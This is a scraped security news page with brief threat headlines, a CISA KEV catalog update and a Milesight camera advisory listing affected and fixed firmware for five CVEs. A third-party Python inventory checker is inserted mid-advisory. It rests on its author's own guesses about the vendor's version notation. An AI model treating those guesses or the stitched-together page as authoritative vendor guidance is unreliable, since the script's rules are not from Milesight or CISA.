Lazarus continues leveraging ClickFix for initial access and data theft: in this case, against Mac-centric organizations and their high-value leaders.

CISA Adds Four Known Exploited Vulnerabilities to Catalog

CISA has added four new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
- CVE-2024-7399 Samsung MagicINFO 9 Server Path Traversal Vulnerability
- CVE-2024-57726 SimpleHelp Missing Authorization Vulnerability
- CVE-2024-57728 SimpleHelp Path Traversal Vulnerability
- CVE-2025-29635 D-Link DIR-823X Command Injection Vulnerability

These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.

Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

Chinese APT Abuses Multiple Cloud Tools to Spy on Mongolia

The threat actor gave itself plenty of options to support command and control, tapping Microsoft Outlook, Slack, Discord, and file.io for online espionage.

Tropic Trooper APT Takes Aim at Home Routers, Japanese Targets

The Chinese state-sponsored cyber threat is known for moving fast and trying odd attack vectors; now it's branching out in tools, victimology, and TTPs.

China-Backed Hackers Are Industrializing Botnets

China's state-backed groups are now using covert networks of compromised devices to execute attacks in a low-cost, low-risk, and deniable way.

Bad Memories Still Haunt AI Agents

Cisco found and fixed a significant vulnerability in the way Anthropic handles memories, but experts warn that mishandled memory files will continue to threaten AI systems.

Milesight Cameras

Summary

Successful exploitation of these vulnerabilities could crash the device being accessed or allow remote code execution.

The following versions of Milesight Cameras are affected. Every model listed below is affected by the same five CVEs (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766); the version given is the highest affected firmware version.
- MS-Cxx63-PD <=51.7.0.77-r12
- MS-Cxx64-xPD <=51.7.0.77-r12
- MS-Cxx73-xPD <=51.7.0.77-r12
- MS-Cxx75-xxPD <=51.7.0.77-r12
- MS-Cxx83-xPD <=51.7.0.77-r12
- MS-Cxx74-PA <=3x.8.0.3-r11
- MS-C8477-HPG1 <=63.8.0.4-r3
- MS-C8477-PC <=48.8.0.4-r3
- MS-C5321-FPE <=62.8.0.4-r5
- MS-Cxx72-xxxPE <=61.8.0.5-r2
- MS-Cxx62-xxxPE <=61.8.0.5-r2
- MS-Cxx52-xxxPE <=61.8.0.5-r2
- MS-Cxx66-xxxPE <=61.8.0.5-r2
- MS-Cxx66-xxxGPE <=61.8.0.5-r2
- MS-Cxx61-xxxPE <=61.8.0.5-r2
- MS-Cxx67-xxxPE <=61.8.0.5-r2
- MS-Cxx71-xxxPE <=61.8.0.5-r2
- MS-Cxx41-xxxPE <=61.8.0.5-r2
- MS-Cxx76-PE <=61.8.0.5-r2
- MS-Cxx65-PE <=61.8.0.5-r2
- MS-Cxx66-xxxG1 <=63.8.0.5-r3
- MS-Cxx62-xxxG1 <=63.8.0.5-r3
- MS-Cxx72-xxxG1 <=63.8.0.5-r3
- MS-CQxx31-xxxG1 <=CQ_63.8.0.5-r1
- MS-CQxx68-xxxG1 <=CQ_63.8.0.5-r1
- MS-CQxx72-xxxG1 <=CQ_63.8.0.5-r1
- MS-Nxxxx-NxE <=7x.9.0.19-r5
- MS-Nxxxx-xxC <=7x.9.0.19-r5
- MS-Nxxxx-xxE <=7x.9.0.19-r5
- MS-Nxxxx-xxG <=7x.9.0.19-r5
- MS-Nxxxx-xxH <=7x.9.0.19-r5
- MS-Nxxxx-xxT <=7x.9.0.19-r5
- PMC8266-FPE <=PO_61.8.0.4_LPR
- PMC8266-FGPE <=PO_61.8.0.4_LPR
- PM3322-E <=PI_61.8.0.3_LPR-r3
- TS4466-X4RIPG1 <=T_63.8.0.4_LPR-r3
- TS5366-X12RIPG1 <=T_63.8.0.4_LPR-r3
- TS8266-X4RIPG1 <=T_63.8.0.4_LPR-r3
- TS4466-X4RIVPG1 <=T_63.8.0.4_LPR-r3
- TS4466-RFIVPG1 <=T_63.8.0.4_LPR-r3
- TS8266-X4RIVPG1 <=T_63.8.0.4_LPR-r3
- TS8266-RFIVPG1 <=T_63.8.0.4_LPR-r3
- TS4466-X4RIWG1 <=T_63.8.0.4_LPR-r3
- TS8266-X4RIWG1 <=T_63.8.0.4_LPR-r3
- TS5510-GVH <=T_47.8.0.4_LPR-r7
- TS5510-GH <=T_47.8.0.4_LPR-r6
- TS5511-GVH <=T_47.8.0.4_LPR-r6
- TS2966-X12TPE <=T_61.8.0.4_LPR-r3
- TS4466-X4RPE <=T_61.8.0.4_LPR-r3
- TS5366-X12PE <=T_61.8.0.4_LPR-r3
- TS8266-X4PE <=T_61.8.0.4_LPR-r3
- TS2966-X12TVPE <=T_61.8.0.4_LPR-r3
- TS4466-X4RVPE <=T_61.8.0.4_LPR-r3
- TS5366-X12VPE <=T_61.8.0.4_LPR-r3
- TS8266-X4VPE <=T_61.8.0.4_LPR-r3
- TS4441-X36RPE <=T_61.8.0.4_LPR-r3
- TS4441-X36RE <=T_61.8.0.4_LPR-r3
- TS4466-X4RWE <=T_61.8.0.4_LPR-r3
- TS8266-X4WE <=T_61.8.0.4_LPR-r3
- MS-C2964-RFLPC <=T_45.8.0.3-r9
- MS-C2972-RFLPC <=T_45.8.0.3-r9
- MS-C2966-RFLWPC <=T_45.8.0.3-r9
- TS2866-X4TPC <=T_45.8.0.3-r9
- TS2866-X4TVPC <=T_45.8.0.3-r9
- TS2866-X4TGPC <=T_45.8.0.3-r9
- TS2841-X36TPC <=T_45.8.0.3-r9
- TS2841-X36TPC/W <=T_45.8.0.3-r9
- TS2867-X5TPC <=T_45.8.0.3-r9
- TS2961-X12TPC <=T_45.8.0.3-r9
- TS8266-FPC/P <=T_45.8.0.3-r9 (CVE-2026-28747, CVE-2026-27785,
CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-C2966-X12RLPC <=T_45.8.0.3-r9 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-C2966-X12RLVPC <=T_45.8.0.3-r9 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-C5366-X12LPC <=T_45.8.0.3-r9 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-C5366-X12LVPC <=T_45.8.0.3-r9 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-C5361-X12LPC <=T_45.8.0.3-r9 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-Cxx66-xxxxGOPC <=45.8.0.2-AIoT-r4 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) SC211 <=C_21.1.0.8-r4 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) SP111 <=52.8.0.4-r5 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-Cxx66-RFIPKG1 <=63.8.0.4-r1-NX (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-Cxx72-RFIPKG1 <=63.8.0.4-r1-NX (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-Cxx66-FIPKG1 <=63.8.0.4-r1-NX (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-Cxx72-FIPKG1 <=63.8.0.4-r1-NX (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) CVSS Vendor Equipment Vulnerabilities v3 9.8 Milesight Milesight Cameras Authorization Bypass Through User-Controlled Key, Use of Hard-coded Credentials, Use of Hard-coded Cryptographic Key, Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'), Heap-based Buffer Overflow Background Critical Infrastructure Sectors: Commercial Facilities Countries/Areas Deployed: Worldwide Company Headquarters Location: China Vulnerabilities Expand All + CVE-2026-28747 A weak key generation vulnerability exists in specific firmware versions of Milesight AIOT cameras. 
Affected Products
Milesight Cameras (Vendor: Milesight). Product Status: known_affected. For each model, the affected firmware and the vendor fix:
MS-Cxx63-PD: 51.7.0.77-r12 and prior versions: Update to 51.7.0.77-r13
MS-Cxx64-xPD: 51.7.0.77-r12 and prior versions: Update to 51.7.0.77-r13
MS-Cxx73-xPD: 51.7.0.77-r12 and prior versions: Update to 51.7.0.77-r13
MS-Cxx75-xxPD: 51.7.0.77-r12 and prior versions: Update to 51.7.0.77-r13
MS-Cxx83-xPD: 51.7.0.77-r12 and prior versions: Update to 51.7.0.77-r13
MS-Cxx74-PA: 3x.8.0.3-r11 and prior versions: Update to 3x.8.0.3-r13
MS-C8477-HPG1: 63.8.0.4-r3 and prior versions: Update to 63.8.0.4-r4
MS-C8477-PC: 48.8.0.4-r3 and prior versions: Update to 48.8.0.4-r4
MS-C5321-FPE: 62.8.0.4-r5 and prior versions: Update to 62.8.0.4-r6
MS-Cxx72-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2
MS-Cxx62-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2
MS-Cxx52-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2
MS-Cxx66-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2
MS-Cxx66-xxxGPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2
MS-Cxx61-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2
MS-Cxx67-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2
MS-Cxx71-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2
MS-Cxx41-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2
MS-Cxx76-PE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2
MS-Cxx65-PE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2
MS-Cxx66-xxxG1: 63.8.0.5-r3 and prior versions: Update to 63.8.0.5-r4
MS-Cxx62-xxxG1: 63.8.0.5-r3 and prior versions: Update to 63.8.0.5-r4
MS-Cxx72-xxxG1: 63.8.0.5-r3 and prior versions: Update to 63.8.0.5-r4
MS-CQxx31-xxxG1: CQ_63.8.0.5-r1 and prior versions: Update to CQ_63.8.0.5-r2
MS-CQxx68-xxxG1: CQ_63.8.0.5-r1 and prior versions: Update to CQ_63.8.0.5-r2
MS-CQxx72-xxxG1: CQ_63.8.0.5-r1 and prior versions: Update to CQ_63.8.0.5-r2
MS-Nxxxx-NxE: 7x.9.0.19-r5 and prior versions: Update to 7x.9.0.19-r6
MS-Nxxxx-xxC: 7x.9.0.19-r5 and prior versions: Update to 7x.9.0.19-r6
MS-Nxxxx-xxE: 7x.9.0.19-r5 and prior versions: Update to 7x.9.0.19-r6
MS-Nxxxx-xxG: 7x.9.0.19-r5 and prior versions: Update to 7x.9.0.19-r6
MS-Nxxxx-xxH: 7x.9.0.19-r5 and prior versions: Update to 7x.9.0.19-r6
MS-Nxxxx-xxT: 7x.9.0.19-r5 and prior versions: Update to 7x.9.0.19-r6
PMC8266-FPE: PO_61.8.0.4_LPR and prior versions: Update to PO_61.8.0.4-r1
PMC8266-FGPE: PO_61.8.0.4_LPR and prior versions: Update to PO_61.8.0.4-r1
PM3322-E: PI_61.8.0.3_LPR-r3 and prior versions: Update to PI_61.8.0.3-r5
TS4466-X4RIPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4
TS5366-X12RIPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4
TS8266-X4RIPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4
TS4466-X4RIVPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4
TS4466-RFIVPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4
TS8266-X4RIVPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4
TS8266-RFIVPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4
TS4466-X4RIWG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4
TS8266-X4RIWG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4
TS5510-GVH: T_47.8.0.4_LPR-r7 and prior versions: Update to T_47.8.0.4-r8
TS5510-GH: T_47.8.0.4_LPR-r6 and prior versions: Update to T_47.8.0.4-r8
TS5511-GVH: T_47.8.0.4_LPR-r6 and prior versions: Update to T_47.8.0.4-r8
TS2966-X12TPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4
TS4466-X4RPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4
TS5366-X12PE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4
TS8266-X4PE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4
TS2966-X12TVPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4
TS4466-X4RVPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4
TS5366-X12VPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4
TS8266-X4VPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4
TS4441-X36RPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4
TS4441-X36RE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4
TS4466-X4RWE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4
TS8266-X4WE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4
MS-C2964-RFLPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10
MS-C2972-RFLPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10
MS-C2966-RFLWPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10
TS2866-X4TPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10
TS2866-X4TVPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10
TS2866-X4TGPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10
TS2841-X36TPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10
TS2841-X36TPC/W: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10
TS2867-X5TPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10
TS2961-X12TPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10
TS8266-FPC/P: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10
MS-C2966-X12RLPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10
MS-C2966-X12RLVPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10
MS-C5366-X12LPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10
MS-C5366-X12LVPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10
MS-C5361-X12LPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10
MS-Cxx66-xxxxGOPC: 45.8.0.2-AIoT-r4 and prior versions: Update to 45.8.0.2-AIoT-r5
SC211: C_21.1.0.8-r4 and prior versions: Update to C_21.1.0.8-r5
SP111: 52.8.0.4-r5 and prior versions: Update to 52.8.0.4-r6
MS-Cxx66-RFIPKG1: 63.8.0.4-r1-NX and prior versions: Update to 63.8.0.5-r2-NX
MS-Cxx72-RFIPKG1: 63.8.0.4-r1-NX and prior versions: Update to 63.8.0.5-r2-NX
MS-Cxx66-FIPKG1: 63.8.0.4-r1-NX and prior versions: Update to 63.8.0.5-r2-NX
MS-Cxx72-FIPKG1: 63.8.0.4-r1-NX and prior versions: Update to 63.8.0.5-r2-NX

Remediations
Milesight advises all users to update their device to the latest firmware versions of PE/PC/PA found at https://www.milesight.com/support/download/firmware. Note that for the PE models listed at 61.8.0.5-r2 the advisory prints the same build as both the affected ceiling and the fix; confirm the correct target build with Milesight before treating such devices as remediated.
Milesight asks all users to report potential security vulnerabilities to security@milesight.com.
Learn more: Milesight Vulnerability Reporting Policy, https://www.milesight.com/legal/vulnerability-report

Relevant CWE: CWE-639 Authorization Bypass Through User-Controlled Key

Metrics
CVSS Version: 3.1
Base Score: 7.1
Base Severity: HIGH
Vector String: CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2026-27785
Specific firmware versions of Milesight AIOT cameras contain hard-coded credentials.
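The per-product affected/fix rows above are what a fleet owner actually has to act on, so here is an added example (my own code, not the advisory's, Milesight's or CISA's) that parses the vendor's version strings and classifies an inventory against an excerpt of those rows. The advisory does not define its notation, so the script assumes that a lowercase x in a model or version string is a one-character wildcard, that a version without a -rN suffix is revision 0, that branch prefixes (T_, CQ_, PO_) and tags (_LPR, -AIoT, -NX) play no part in ordering, and that the first matching row wins; ADVISORY_ROWS is an excerpt of the table and SAMPLE_INVENTORY is constructed for the example. It flags rows whose printed fix is not newer than the affected ceiling, and firmware that falls between the ceiling and the fix, rather than silently calling either one fixed.

```python
"""Inventory check against the Milesight advisory's per-product firmware table.
Added example, not code from Milesight or CISA.  Assumptions the advisory does not
spell out: lowercase 'x' in a model or version is a one-character wildcard; a version
with no '-rN' suffix is revision 0; branch prefixes (T_, CQ_, PO_) and tags (_LPR,
-AIoT, -NX) play no part in ordering, only the numeric core and -rN revision do."""
import re
from collections import namedtuple

# Excerpt of the advisory's vendor-fix rows: (model pattern, affected ceiling, fix).
# A real run would carry every row; this excerpt keeps one row per version style.
ADVISORY_ROWS = [
    ("MS-Cxx63-PD",      "51.7.0.77-r12",     "51.7.0.77-r13"),
    ("MS-Cxx74-PA",      "3x.8.0.3-r11",      "3x.8.0.3-r13"),
    ("MS-Cxx66-xxxPE",   "61.8.0.5-r2",       "61.8.0.5-r2"),    # fix == ceiling as printed
    ("PMC8266-FPE",      "PO_61.8.0.4_LPR",   "PO_61.8.0.4-r1"),
    ("TS4466-X4RIPG1",   "T_63.8.0.4_LPR-r3", "T_63.8.0.4-r4"),
    ("TS5510-GH",        "T_47.8.0.4_LPR-r6", "T_47.8.0.4-r8"),
    ("MS-Cxx66-RFIPKG1", "63.8.0.4-r1-NX",    "63.8.0.5-r2-NX"),
]

_VERSION_RE = re.compile(
    r"^(?:[A-Z]+_)?"                    # optional branch prefix: T_, CQ_, PO_, PI_, C_
    r"(?P<core>[0-9x]+(?:\.[0-9x]+)*)"  # dotted numeric core; 'x' allowed in a component
    r"(?P<rest>.*)$")                   # tags and -rN, in whatever order the vendor used

# core: ints, or None for a wildcard component such as '3x'; tags kept only for reporting
Version = namedtuple("Version", "core rev tags")

def parse_version(text: str) -> Version:
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised Milesight version string: {text!r}")
    core = tuple(None if "x" in c else int(c) for c in m.group("core").split("."))
    rev, tags = 0, set()
    for tok in filter(None, re.split(r"[-_]", m.group("rest"))):
        if re.fullmatch(r"r\d+", tok):
            rev = int(tok[1:])
        else:
            tags.add(tok)
    return Version(core, rev, frozenset(tags))

def compare(a: Version, b: Version) -> int:
    """Return -1, 0 or 1.  A wildcard component equals anything; tags are ignored."""
    for x, y in zip(a.core, b.core):
        if x is None or y is None or x == y:
            continue
        return -1 if x < y else 1
    if len(a.core) != len(b.core):
        return -1 if len(a.core) < len(b.core) else 1
    return (a.rev > b.rev) - (a.rev < b.rev)

def model_matches(pattern: str, model: str) -> bool:
    # lowercase 'x' is the wildcard; uppercase 'X' (as in TS4466-X4RIPG1) is literal
    regex = "".join("." if ch == "x" else re.escape(ch) for ch in pattern)
    return re.fullmatch(regex, model) is not None

def assess(model: str, firmware: str, rows=ADVISORY_ROWS) -> dict:
    """Classify one device as not_listed, affected, fixed or indeterminate (first row wins)."""
    fw = parse_version(firmware)
    verdict = {"model": model, "firmware": firmware, "status": "not_listed", "notes": []}
    for pattern, ceiling_s, fix_s in rows:
        if not model_matches(pattern, model):
            continue
        ceiling, fix = parse_version(ceiling_s), parse_version(fix_s)
        verdict["row"] = (pattern, ceiling_s, fix_s)
        if compare(fix, ceiling) <= 0:
            verdict["notes"].append("advisory row lists a fix that is not newer than the "
                                    "affected ceiling; confirm the target build with the vendor")
        if compare(fw, ceiling) <= 0:       # "X and prior versions" -> affected
            verdict["status"] = "affected"
        elif compare(fw, fix) >= 0:
            verdict["status"] = "fixed"
        else:                               # newer than the ceiling, older than the fix
            verdict["status"] = "indeterminate"
            verdict["notes"].append("firmware is between the affected ceiling and the fix; "
                                    "treat as affected until the vendor confirms otherwise")
        break
    return verdict

# Constructed sample inventory; model and firmware strings are illustrative.
SAMPLE_INVENTORY = [
    ("MS-C2963-PD",      "51.7.0.77-r12"),      # at the ceiling          -> affected
    ("MS-C5374-PA",      "32.8.0.3-r10"),       # wildcard core '3x'      -> affected
    ("MS-C2966-RFLPE",   "61.8.0.5-r2"),        # fix == ceiling row      -> affected, noted
    ("PMC8266-FPE",      "PO_61.8.0.4_LPR"),    # no -rN, revision 0      -> affected
    ("TS4466-X4RIPG1",   "T_63.8.0.4-r4"),      # _LPR dropped in the fix -> fixed
    ("TS5510-GH",        "T_47.8.0.4_LPR-r7"),  # between r6 and r8       -> indeterminate
    ("MS-C2966-RFIPKG1", "63.8.0.5-r2-NX"),     # -NX tag                 -> fixed
    ("MS-C8477-PC",      "48.8.0.4-r3"),        # row not in this excerpt -> not_listed
]

def check_inventory(inventory=SAMPLE_INVENTORY, rows=ADVISORY_ROWS) -> list:
    return [assess(model, fw, rows) for model, fw in inventory]

if __name__ == "__main__":
    for v in check_inventory():
        print(f"{v['model']:<18} {v['firmware']:<20} {v['status']}  {'; '.join(v['notes'])}")
```

Run it as a script to get one line per device; before using it on a real fleet, extend ADVISORY_ROWS with the remaining rows from the table above and check the wildcard assumption against the model strings your cameras actually report. The indeterminate status exists because the advisory states only a ceiling and a fix per model, not which intermediate builds exist, so a device between the two should be treated as affected.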
Affected Products
Milesight Cameras (Vendor: Milesight). The affected product versions are the same as listed for CVE-2026-28747 above. Product Status: known_affected.

Remediations
Milesight advises all users to update their device to the latest firmware versions of PE/PC/PA found at https://www.milesight.com/support/download/firmware. The per-product vendor fixes are the same as listed for CVE-2026-28747 above.
Milesight asks all users to report potential security vulnerabilities to security@milesight.com.
Learn more: Milesight Vulnerability Reporting Policy, https://www.milesight.com/legal/vulnerability-report

Relevant CWE: CWE-798 Use of Hard-coded Credentials

Metrics
CVSS Version: 3.1
Base Score: 8.8
Base Severity: HIGH
Vector String: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2026-32644
Specific firmware versions of Milesight AIOT cameras use SSL certificates with default private keys.
Affected Products
Milesight Cameras (Vendor: Milesight). The affected product versions are the same as listed for CVE-2026-28747 above. Product Status: known_affected.

Remediations
Milesight advises all users to update their device to the latest firmware versions of PE/PC/PA found at https://www.milesight.com/support/download/firmware.
Vendor fix MS-Cxx63-PD: 51.7.0.77-r12 and prior versions: Update to 51.7.0.77-r13
Vendor fix MS-Cxx64-xPD: 51.7.0.77-r12 and prior versions: Update to 51.7.0.77-r13
Vendor fix MS-Cxx73-xPD: 51.7.0.77-r12 and prior versions: Update to 51.7.0.77-r13
Vendor fix MS-Cxx75-xxPD: 51.7.0.77-r12 and prior versions: Update to 51.7.0.77-r13
Vendor fix MS-Cxx83-xPD: 51.7.0.77-r12 and prior versions: Update to 51.7.0.77-r13
Vendor fix MS-Cxx74-PA: 3x.8.0.3-r11 and prior versions: Update to 3x.8.0.3-r13
Vendor fix MS-C8477-HPG1: 63.8.0.4-r3 and prior versions: Update to 63.8.0.4-r4
Vendor fix MS-C8477-PC: 48.8.0.4-r3 and prior versions: Update to 48.8.0.4-r4
Vendor fix MS-C5321-FPE: 62.8.0.4-r5 and prior versions: Update to 62.8.0.4-r6
Vendor fix MS-Cxx72-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2
Vendor fix MS-Cxx62-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2
Vendor fix MS-Cxx52-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2
Vendor fix MS-Cxx66-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2
Vendor fix MS-Cxx66-xxxGPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2
Vendor fix MS-Cxx61-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2
Vendor fix MS-Cxx67-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2
Vendor fix MS-Cxx71-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2
Vendor fix MS-Cxx41-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2
Vendor fix MS-Cxx76-PE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2
Vendor fix MS-Cxx65-PE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2
Vendor fix MS-Cxx66-xxxG1: 63.8.0.5-r3 and prior versions: Update to 63.8.0.5-r4
Vendor fix MS-Cxx62-xxxG1: 63.8.0.5-r3 and prior versions: Update to 63.8.0.5-r4
Vendor fix MS-Cxx72-xxxG1: 63.8.0.5-r3 and prior versions: Update to 63.8.0.5-r4
Vendor fix MS-CQxx31-xxxG1: CQ_63.8.0.5-r1 and prior versions: Update to CQ_63.8.0.5-r2
Vendor fix MS-CQxx68-xxxG1: CQ_63.8.0.5-r1 and prior versions: Update to CQ_63.8.0.5-r2
Vendor fix MS-CQxx72-xxxG1: CQ_63.8.0.5-r1 and prior versions: Update to CQ_63.8.0.5-r2
Vendor fix MS-Nxxxx-NxE: 7x.9.0.19-r5 and prior versions: Update to 7x.9.0.19-r6
Vendor fix MS-Nxxxx-xxC: 7x.9.0.19-r5 and prior versions: Update to 7x.9.0.19-r6
Vendor fix MS-Nxxxx-xxE: 7x.9.0.19-r5 and prior versions: Update to 7x.9.0.19-r6
Vendor fix MS-Nxxxx-xxG: 7x.9.0.19-r5 and prior versions: Update to 7x.9.0.19-r6
Vendor fix MS-Nxxxx-xxH: 7x.9.0.19-r5 and prior versions: Update to 7x.9.0.19-r6
Vendor fix MS-Nxxxx-xxT: 7x.9.0.19-r5 and prior versions: Update to 7x.9.0.19-r6
Vendor fix PMC8266-FPE: PO_61.8.0.4_LPR and prior versions: Update to PO_61.8.0.4-r1
Vendor fix PMC8266-FGPE: PO_61.8.0.4_LPR and prior versions: Update to PO_61.8.0.4-r1
Vendor fix PM3322-E: PI_61.8.0.3_LPR-r3 and prior versions: Update to PI_61.8.0.3-r5
Vendor fix TS4466-X4RIPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4
Vendor fix TS5366-X12RIPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4
Vendor fix TS8266-X4RIPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4
Vendor fix TS4466-X4RIVPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4
Vendor fix TS4466-RFIVPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4
Vendor fix TS8266-X4RIVPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4
Vendor fix TS8266-RFIVPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4
Vendor fix TS4466-X4RIWG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4
Vendor fix TS8266-X4RIWG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4
Vendor fix TS5510-GVH: T_47.8.0.4_LPR-r7 and prior versions: Update to T_47.8.0.4-r8
Vendor fix TS5510-GH: T_47.8.0.4_LPR-r6 and prior versions: Update to T_47.8.0.4-r8
Vendor fix TS5511-GVH: T_47.8.0.4_LPR-r6 and prior versions: Update to T_47.8.0.4-r8
Vendor
